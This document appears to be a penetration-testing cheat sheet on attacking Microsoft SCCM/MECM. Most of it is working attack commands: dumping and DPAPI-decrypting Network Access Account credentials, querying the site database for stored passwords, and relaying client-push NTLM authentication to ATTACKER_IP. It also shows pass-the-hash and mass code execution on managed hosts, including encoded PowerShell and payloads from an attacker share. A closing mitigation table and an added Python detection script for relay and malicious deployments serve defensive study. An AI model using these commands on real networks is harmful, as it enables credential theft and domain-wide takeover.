SCCM / MECM Attacks
aka SCCM, MECM, ConfigMgr, System Center Configuration Manager, SharpSCCM
SCCM (System Center Configuration Manager / MECM) attack surface: hierarchy discovery, credential extraction from NAA/client push, site takeover via relay, SCCM as a domain-wide code execution primitive, and SharpSCCM tooling.
Ports
| Port | Proto | Notes |
|---|---|---|
| 80 | tcp | SCCM Management Point (HTTP) |
| 443 | tcp | SCCM Management Point (HTTPS) |
| 8005 | tcp | SCCM Service Manager default |
| 10123 | tcp | SCCM client notification |
Fingerprint
- AD has computer objects with 'SMS' or 'SCCM' in their name
- SPN: WSMAN/sccm.domain.local or HTTP/sccm.domain.local registered
- SharpSCCM.exe local sms-provider finds the local MP name
Key files
| Path | Holds | Sensitive |
|---|---|---|
| C:\Windows\CCM\CcmMessaging.log | SCCM client communication logs | |
| WMI: root\ccm\policy\defaultmachine\requestedconfig | Network Access Account (NAA) credentials (encrypted) | sensitive |
| SCCM site database (MSSQL) | all managed host data, credentials, packages | sensitive |
Exploitation primitives
- NAA credentials: WMI query extracts encrypted NAA creds → DPAPI decrypt → plaintext AD creds
- Client push install: forces NTLM auth from site server → relay to LDAP → escalation
- Compromised SCCM admin → deploy malicious package to all managed hosts = mass RCE
- Site server machine account has local admin on all managed clients via push install
Discovery
Identify SCCM infrastructure
```powershell
# From AD — find SCCM servers by SPN/name
Get-DomainComputer | Where { $_.dnshostname -match "sccm|mecm|configmgr|cm" }
Get-DomainComputer -SPN "SMS*" | select dnshostname, serviceprincipalname
# Find AD System Management container (where site server stores data)
Get-DomainObject -SearchBase "CN=System Management,CN=System,DC=domain,DC=local"
```
```powershell
# From a managed client
SharpSCCM.exe local sms-provider
SharpSCCM.exe local site-info
```
```bash
# Network sweep for SCCM management points
nmap -p 80,443,8005 10.129.0.0/24 --open
nxc smb 10.129.0.0/24 | grep -i "sccm\|mecm\|configmgr"
# SCCMHunter — automated SCCM discovery
python3 sccmhunter.py find -u user -p pass -d domain.local -dc DC_IP
```
Credential Extraction from Managed Clients
Network Access Account (NAA) via WMI
SCCM uses a Network Access Account (NAA) so that clients can reach distribution points. The account's credentials are stored, encrypted, in WMI on every managed client; a user with local admin on the client can decrypt them.
```powershell
# SharpSCCM (from a managed client)
SharpSCCM.exe local naa
# Manual WMI query
Get-WmiObject -Namespace root\ccm\policy\Machine\RequestedConfig -Class CCM_NetworkAccessAccount
# Or via CIM
Get-CimInstance -Namespace root\ccm\policy\Machine\RequestedConfig -ClassName CCM_NetworkAccessAccount
```
The output contains the credentials as a hex-encoded DPAPI blob. Decrypt it with DPAPI on the same machine (LocalMachine scope is bound to that host's master key):

```powershell
# CyberChef or PowerShell DPAPI
Add-Type -AssemblyName System.Security   # ProtectedData needs this assembly in Windows PowerShell 5.1
$encrypted = 'hex_encoded_credential'
# Hex -> bytes by hand: [Convert]::FromHexString only exists on .NET 5+, not in Windows PowerShell
$bytes = [byte[]]::new($encrypted.Length / 2)
for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = [Convert]::ToByte($encrypted.Substring(2 * $i, 2), 16) }
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
[System.Text.Encoding]::UTF8.GetString($decrypted)
```
Client Push Account
```powershell
# The push install account is often stored in SCCM and has local admin on all clients
SharpSCCM.exe get naa
SharpSCCM.exe get accounts
```
Client Push Install → NTLM Relay
When SCCM pushes the client agent to a new machine, the site server authenticates to it over SMB with the client push installation account. If that push is directed at an attacker-controlled host, the NTLM authentication can be captured and relayed.
```bash
# Step 1: start ntlmrelayx targeting LDAP (for DCSync rights or computer account creation)
ntlmrelayx.py -t ldap://DC_IP --add-computer EVILPC --computer-password 'EvilPass123!'
```
```powershell
# Step 2: request client push install targeting your attacker IP
SharpSCCM.exe invoke admin-service -sms SCCM_SERVER -sc TARGET_SITECODE -uc attacker@domain.local -pc ATTACKER_IP
# The site server connects to ATTACKER_IP:445 → ntlmrelayx captures + relays the push account hash
```
SCCM Admin → Mass RCE
If you obtain SCCM administrator credentials:
Deploy a malicious application
```powershell
# SharpSCCM — create and deploy application to all managed clients
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITECODE -p "cmd.exe /c whoami > C:\Temp\pwned.txt" -d "All Systems"
# Or:
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITECODE -p "powershell -enc BASE64_PAYLOAD"
```
This runs as SYSTEM on every machine in the targeted collection, which is equivalent to domain-wide RCE.
Create a package (stealthier)
```powershell
# Create package pointing to attacker-hosted payload
SharpSCCM.exe get collections
SharpSCCM.exe exec -sms SERVER -sc SC -p "\\ATTACKER\share\payload.exe" -t "All Workstations"
```
SCCM Hierarchy Takeover
If you compromise the Central Administration Site (CAS) or Primary Site:
```powershell
# Enumerate site hierarchy
SharpSCCM.exe get sites
SharpSCCM.exe get collections -sms SCCM_SERVER -sc SITECODE
```
```bash
# Site server has local admin on all managed clients (from push installation)
# Compromise site server machine account → PTH to all clients
nxc smb 10.129.0.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASH
```
SCCM Database (MSSQL)
The SCCM site database stores all managed host info, credentials, and package configs:
```bash
# Connect to SCCM DB (usually on the site server or a dedicated SQL server)
mssqlclient.py -windows-auth domain.local/admin:pass@SCCM_SQL_SERVER
```
```sql
-- Query managed computers
SELECT Name, LastLogon00, IPAddress0 FROM CM_SC1.dbo.v_R_System;
-- Extract all NAA credentials stored in DB
SELECT UserName, Password FROM CM_SC1.dbo.vSMS_SC_SiteDefinition_Property WHERE PropertyName = 'NAA';
```
SCCMHunter — Automated Attack
```bash
# Full discovery
python3 sccmhunter.py find -u user -p pass -d domain.local -dc DC_IP
# Check permissions
python3 sccmhunter.py check admin -u user -p pass -d domain.local
# Extract NAA credentials
python3 sccmhunter.py http -u user -p pass -d domain.local -t SCCM_SERVER
```
Detection and Hardening Notes
| Attack | Mitigation |
|---|---|
| NAA credential extraction | Use HTTPS for MP; use certificates not NAA accounts |
| Client push relay | Enable push install account protection; use Kerberos |
| Admin → mass RCE | Tier SCCM admins; require MFA; log all deployments |
| DB access | Separate SCCM DB on hardened SQL; restrict access |
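Detection logic for two rows of the table above, the client push relay and the admin-driven mass deployment, as an added Python example that is not part of the original page and not code from SharpSCCM or SCCMHunter. The host inventory, the push identities, the key=value record format and every log line are constructed for the example; in a real deployment the logon records would come from the site server's outbound authentication events and the deployment records from SCCM's deployment and status messages.

```python
"""Added example: detection checks for two SCCM abuse patterns from the
mitigation table (client push NTLM relay, admin-driven mass deployment).
All inventory, identities and records below are CONSTRUCTED for the example;
the key=value line format is a hypothetical export, not an SCCM log format."""
import re
from collections import namedtuple

# Constructed: hosts the site already manages (what v_R_System would list).
MANAGED_HOSTS = {"ws01.domain.local", "ws02.domain.local", "srv-file01.domain.local"}

# Constructed: identities expected to authenticate outbound during client push
# (the site server machine account and the client push installation account).
PUSH_IDENTITIES = {r"DOMAIN\SCCMSERVER$", r"DOMAIN\svc_sccmpush"}

# Constructed sample of outbound logon records from the site server.
SAMPLE_LOGONS = r"""time=2024-05-01T10:01:02 account=DOMAIN\svc_sccmpush auth=NTLM target=ws01.domain.local
time=2024-05-01T10:03:15 account=DOMAIN\svc_sccmpush auth=NTLM target=192.0.2.77
time=2024-05-01T10:05:40 account=DOMAIN\SCCMSERVER$ auth=Kerberos target=ws02.domain.local
time=2024-05-01T10:07:09 account=DOMAIN\alice auth=NTLM target=unknown-host.domain.local
"""

# Constructed sample of deployment records (collection, creator, program line).
SAMPLE_DEPLOYMENTS = r"""id=D001 collection="Finance Workstations" creator=DOMAIN\cm_admin program="msiexec /i \\cm01\pkg\app.msi /qn"
id=D002 collection="All Systems" creator=DOMAIN\cm_admin program="powershell -enc SQBFAFgA..."
id=D003 collection="All Workstations" creator=DOMAIN\jdoe program="cmd.exe /c whoami > C:\Temp\out.txt"
id=D004 collection="Pilot Ring" creator=DOMAIN\cm_admin program="setup.exe /silent"
"""

# Built-in collections that cover every client: a deployment here is a
# domain-wide change and deserves review regardless of who created it.
BROAD_COLLECTIONS = {"all systems", "all workstations", "all desktop and server clients"}

# Program lines that hand control to a script interpreter or a LOLBin rather
# than an installer have the shape of the "exec" abuse described above.
INTERPRETER_RE = re.compile(
    r"powershell(\.exe)?\s.*-(enc|encodedcommand)\b|cmd(\.exe)?\s+/c\b|mshta|rundll32|regsvr32",
    re.IGNORECASE,
)

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
Finding = namedtuple("Finding", "record reason")


def parse_kv(line):
    """Parse one key=value line; values may be double-quoted to contain spaces."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in KV_RE.finditer(line)}


def flag_push_to_unmanaged(logon_text, managed=MANAGED_HOSTS, push_ids=PUSH_IDENTITIES):
    """Flag push identities authenticating to a host outside the SCCM inventory:
    the site server should only ever push the agent to machines it knows about."""
    managed_lc = {h.lower() for h in managed}
    findings = []
    for line in logon_text.splitlines():
        rec = parse_kv(line)
        if rec.get("account") not in push_ids:
            continue
        if rec.get("target", "").lower() in managed_lc:
            continue
        reason = "push identity authenticated to host outside SCCM inventory"
        if rec.get("auth", "").upper() == "NTLM":
            reason += " over NTLM (relayable)"
        findings.append(Finding(rec, reason))
    return findings


def flag_risky_deployments(deploy_text):
    """Flag deployments that hit a broad built-in collection and/or run an
    interpreter command line instead of a packaged installer."""
    findings = []
    for line in deploy_text.splitlines():
        rec = parse_kv(line)
        reasons = []
        if rec.get("collection", "").lower() in BROAD_COLLECTIONS:
            reasons.append("targets broad built-in collection")
        if INTERPRETER_RE.search(rec.get("program", "")):
            reasons.append("program line launches a script interpreter or LOLBin")
        if reasons:
            findings.append(Finding(rec, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for f in flag_push_to_unmanaged(SAMPLE_LOGONS) + flag_risky_deployments(SAMPLE_DEPLOYMENTS):
        print(f.reason, "->", f.record)
```

On the constructed data the push check flags only the NTLM logon to 192.0.2.77, a host the site has no record of, and the deployment check flags D002 and D003 (broad collection plus interpreter command line) while letting the installer-based deployments through. The inventory comparison is the part worth keeping: a legitimate push always targets a machine SCCM already knows, so a push identity appearing against anything else is a high-signal event whether or not NTLM was used.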